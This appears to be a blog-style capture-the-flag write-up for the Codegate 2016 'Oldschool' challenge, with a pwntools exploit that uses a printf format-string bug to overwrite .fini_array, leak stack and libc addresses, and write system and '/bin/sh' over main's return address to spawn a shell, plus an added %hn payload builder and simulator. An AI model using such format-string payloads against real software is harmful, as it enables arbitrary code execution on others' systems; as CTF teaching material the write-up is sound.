cdor1's lab
Codegate 2016 Oldschool
I overwrote the .fini_array entry, which is referenced once main returns, with main's address one more time, and exploited it in two passes: the first for the address leak, the second for the return-address overwrite.
I didn't know how to feed the leaked addresses back in through the format string, so I referred to binee's payload.
system_l = system & 0xffff
system_h = system >> 16
Split each 32-bit value into its low and high 16-bit halves this way and write each half with its own %hn (low half at the address, high half at address + 2). Keep in mind that %hn stores the low 16 bits of the running character count, so the %c widths are cumulative: each successive target half has to be reached in increasing order, or wrapped past 0x10000.
from pwn import *

s = process('./oldschool')

# Stage 1: one format string does two jobs. It leaks a stack address and a libc
# address through %N$x, and it overwrites the .fini_array entry (written as two
# 16-bit halves at 0x80496dc and 0x80496de) so that main runs a second time.
# The %c widths are cumulative: each %hn stores the total number of characters
# printed so far, truncated to 16 bits.
payload = b''
payload += p32(0x80496dc)          # printf argument 7
payload += p32(0x80496de)          # printf argument 8
payload += b'stack: 0x%264$08x'
payload += b'libc: 0x%271$08x'
payload += b'%2011c'
payload += b'%7$hn'
payload += b'%31906c'
payload += b'%8$hn'
s.sendline(payload)

print(s.recvuntil(b'stack: 0x'))
leak_stack = int(s.recvline().strip(), 16)
print(s.recvuntil(b'libc: 0x'))
leak_libc = int(s.recvline().strip(), 16)
leak_libc = leak_libc - 243        # back to the start of the leaked libc function
libc_base = leak_libc - 104928     # offsets below are for the challenge's libc build
system = libc_base + 261744
binsh = libc_base + 0x15DA8C
log.info('stack : ' + hex(leak_stack))
log.info('libc : ' + hex(leak_libc))
log.info('base : ' + hex(libc_base))
log.info('system : ' + hex(system))
log.info('binsh : ' + hex(binsh))

# Stage 2: main's saved return address sits at a fixed distance below the leaked
# stack address. Write system there and the "/bin/sh" pointer at ret + 8 (system's
# argument slot; ret + 4 is system's own return address and is left alone).
system_l = system & 0xffff
system_h = system >> 16
binsh_l = binsh & 0xffff
binsh_h = binsh >> 16
ret_l = leak_stack - 0xe4          # return-address slot (low half)
ret_h = ret_l + 2                  # high half

payload = b''
payload += p32(ret_l)              # printf argument 7
payload += p32(ret_h)              # printf argument 8
payload += p32(ret_l + 8)          # printf argument 9
payload += p32(ret_h + 8)          # printf argument 10
# The 16 address bytes are already printed, so the first width is system_l - 16.
# The remaining widths are differences of the running count, which only works
# while system_l < system_h < binsh_l < binsh_h holds for the leaked values.
payload += b'%' + str(system_l - 16).encode() + b'c'
payload += b'%7$hn'
payload += b'%' + str(system_h - system_l).encode() + b'c'
payload += b'%8$hn'
payload += b'%' + str(binsh_l - system_h).encode() + b'c'
payload += b'%9$hn'
payload += b'%' + str(binsh_h - binsh_l).encode() + b'c'
payload += b'%10$hn'
s.sendline(payload)
s.interactive()
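As an added example (not code from the original post or from binee's payload), the helper below generalizes the halves-and-%hn arithmetic above: it takes a list of (address, 32-bit value) writes, emits the addresses first, sorts the 16-bit halves by value so every %c width is non-negative (wrapping modulo 0x10000 when a target lies below the running count), refuses addresses containing a NUL byte, and checks the result with a small printf model that understands only the %Nc and %N$hn specifiers the payload uses. The argument index 7, the return slot, the system and "/bin/sh" addresses, and the pwntools-free p32 are assumptions chosen for illustration.

```python
import re
import struct


def p32(x):
    """Little-endian 32-bit pack (stand-in for pwntools' p32 so this runs without it)."""
    return struct.pack('<I', x & 0xffffffff)


def halves(addr, value):
    """One 32-bit write as two 16-bit writes: low half at addr, high half at addr + 2."""
    return [(addr, value & 0xffff), (addr + 2, (value >> 16) & 0xffff)]


def build_hn_payload(writes, first_arg, already_printed=0):
    """Build a format string that performs the given (addr, value32) writes with %hn.

    Target addresses come first (printf args first_arg, first_arg + 1, ...); the
    16-bit halves are then written in ascending value order so each %Nc width is
    non-negative. A target below the running count wraps modulo 0x10000, which is
    exactly what %hn truncates to anyway. already_printed is whatever printf has
    already emitted before our buffer (e.g. a prompt).
    """
    targets = [h for addr, val in writes for h in halves(addr, val)]
    payload = b''.join(p32(addr) for addr, _ in targets)
    if b'\x00' in payload:
        raise ValueError('a target address contains a NUL byte; string input would truncate it')
    printed = already_printed + len(payload)
    for i in sorted(range(len(targets)), key=lambda i: targets[i][1]):
        pad = (targets[i][1] - printed) % 0x10000
        if pad:                                  # %0c is not valid; skip when already aligned
            payload += b'%' + str(pad).encode() + b'c'
            printed += pad
        payload += b'%' + str(first_arg + i).encode() + b'$hn'
    return payload


SPEC = re.compile(rb'%(\d+)(c|\$hn)')


def simulate_printf(payload, first_arg, n_targets, already_printed=0):
    """Minimal printf model for %Nc / %N$hn: returns {addr: 16-bit value written}.

    Positional args first_arg.. are taken from the p32 addresses at the front of the
    payload, as they would be if the buffer sits at that argument offset on the stack.
    """
    args = {first_arg + i: struct.unpack('<I', payload[4 * i:4 * i + 4])[0]
            for i in range(n_targets)}
    fmt = payload[4 * n_targets:]
    count = already_printed + 4 * n_targets      # the addresses themselves print as literals
    mem16, pos = {}, 0
    for m in SPEC.finditer(fmt):
        count += m.start() - pos                 # literal bytes between specifiers
        pos = m.end()
        if m.group(2) == b'c':
            count += int(m.group(1))
        else:
            mem16[args[int(m.group(1))]] = count & 0xffff
    return mem16


def read32(mem16, addr):
    """Reassemble a 32-bit value from the two 16-bit halves the payload wrote."""
    return mem16[addr] | (mem16[addr + 2] << 16)


# Constructed values (assumptions, not the challenge's real addresses): a stack
# return-address slot plus system and "/bin/sh" for a hypothetical libc base.
RET = 0xffffd1cc
SYSTEM = 0xf7e3fe70
BINSH = 0xf7f5da8c
FIRST_ARG = 7          # the post's buffer starts at printf argument 7


def stage2_payload():
    # Same layout as the post: system at the return slot, "/bin/sh" at ret + 8.
    return build_hn_payload([(RET, SYSTEM), (RET + 8, BINSH)], FIRST_ARG)


def check_stage2():
    mem = simulate_printf(stage2_payload(), FIRST_ARG, 4)
    return read32(mem, RET), read32(mem, RET + 8)


if __name__ == '__main__':
    print(stage2_payload())
    print([hex(v) for v in check_stage2()])
```

Note that with these constructed values system's low half (0xfe70) is larger than its high half (0xf7e3), so the post's fixed order system_l, system_h, binsh_l, binsh_h would produce a negative width; sorting the halves by value sidesteps that. Mixing positional (%7$hn) and non-positional (%2011c) conversions in one format string is what the post does and glibc accepts it, but it is not guaranteed by POSIX.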